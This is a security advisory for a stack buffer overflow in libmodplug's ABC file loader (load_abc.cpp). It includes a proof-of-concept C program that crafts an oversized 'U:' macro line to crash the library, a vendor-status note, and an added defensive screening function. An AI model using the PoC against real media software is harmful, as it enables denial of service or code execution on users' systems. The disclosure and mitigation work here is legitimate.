Release date:
Updated on:
Affected Systems:
Libmodplug 0.8.8.2
Libmodplug 0.8.8.1
Libmodplug 0.8.7
Libmodplug 0.8.6
Libmodplug 0.8.4
Libmodplug 0.8
Description:
--------------------------------------------------------------------------------
Bugtraq id: 47624
Libmodplug is an open-source library used to play MOD music formats.
The "load_abc.cpp" file in libmodplug contains a remote stack buffer overflow vulnerability. Remote attackers can exploit it to execute arbitrary code with the privileges of the affected application or to cause a denial of service (DoS).
The vulnerability is caused by a boundary error in the "abc_new_macro()" and "abc_new_umacro()" functions in src/load_abc.cpp. The stack buffer overflow is triggered when a user is induced to open a specially crafted ABC file.
<* Source: epiphant
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
epiphant provides the following test method:
#include <libmodplug/modplug.h>
#include <stdio.h>
#include <string.h>
/*
Libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc
http://modplug-xmms.sourceforge.net/
By: epiphant
This exploits one of multiple overflows in load_abc.cpp lol
Vlc media player uses libmodplug
Greets: defrost, babi, ming_wisher, emel1a, a. v., krs
Date: 28 then l 2011
Tested on: CentOS 5.6
*/
int main(void)
{
    /* ABC header: tune index, then the start of a "U:" line */
    char test[512] = "X: 1\nU:";
    unsigned int i;

    /* pad the "U:" line far beyond a normal field length */
    i = strlen(test);
    while (i < 278)
        test[i++] = 'q';
    test[i++] = '1' + 32;
    test[i++] = '3';
    test[i++] = '3';
    test[i++] = '4';
    while (i < 286)
        test[i++] = 'a';
    test[i++] = '\n';
    test[i] = '\0';

    /* remaining header fields and one line of tune body */
    strcat(test, "T: Here Without You (Transcribed by: Bungee)\n");
    strcat(test, "Z: 3 Doors Down\n");
    strcat(test, "L: 1/4\n");
    strcat(test, "Q: 108\n");
    strcat(test, "K: C\n");
    strcat(test, "[, 3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8]\n");

    /* hand the in-memory ABC text to the library's loader */
    i = strlen(test);
    ModPlug_Load(test, i);
    return 0;
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Libmodplug
----------
Currently, the vendor does not provide a patch or an upgrade. We recommend that users of the software watch the vendor's homepage to obtain the latest version:
http://modplug-xmms.sourceforge.net/
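
While no fixed version is available, an application that passes untrusted ABC data to ModPlug_Load() can screen it first. The C check below is an added example, not code from libmodplug or from the original advisory: it rejects input whose "U:" or "m:" header lines exceed a length limit. The function name, the 64-byte limit (a policy value, not the library's buffer size) and the mapping of "m:" lines to abc_new_macro() are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed screening limit for one macro line, in bytes. A policy value chosen
 * for this example, not libmodplug's internal buffer size. */
#define ABC_MAX_MACRO_LINE 64

/* Return the 1-based number of the first "U:" or "m:" line longer than
 * max_line bytes in an in-memory ABC file, or 0 if there is none. */
size_t abc_find_oversized_macro(const char *buf, size_t len, size_t max_line)
{
    size_t pos = 0, lineno = 0;

    while (pos < len) {
        const char *p = buf + pos;
        const char *nl = memchr(p, '\n', len - pos);
        size_t raw = nl ? (size_t)(nl - p) : len - pos;
        size_t n = raw;

        lineno++;
        pos += raw + 1;                      /* step past the newline */
        if (n > 0 && p[n - 1] == '\r')       /* tolerate CRLF files */
            n--;
        while (n > 0 && (*p == ' ' || *p == '\t')) {  /* leading blanks */
            p++;
            n--;
        }
        if (n >= 2 && (p[0] == 'U' || p[0] == 'm') && p[1] == ':' &&
            n > max_line)
            return lineno;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample: a short header followed by an overlong U: line. */
    char sample[512] = "X: 1\nT: demo\nU:";
    size_t i = strlen(sample);
    while (i < 300)
        sample[i++] = 'q';
    strcpy(sample + i, "\nK: C\n");

    size_t hit = abc_find_oversized_macro(sample, strlen(sample), ABC_MAX_MACRO_LINE);
    if (hit)
        printf("reject: oversized macro on line %zu\n", hit);
    return hit ? 1 : 0;
}
```

This covers only the two macro fields named in the description. The test author's note mentions multiple overflows in load_abc.cpp, so the check is a stopgap and not a substitute for an updated library.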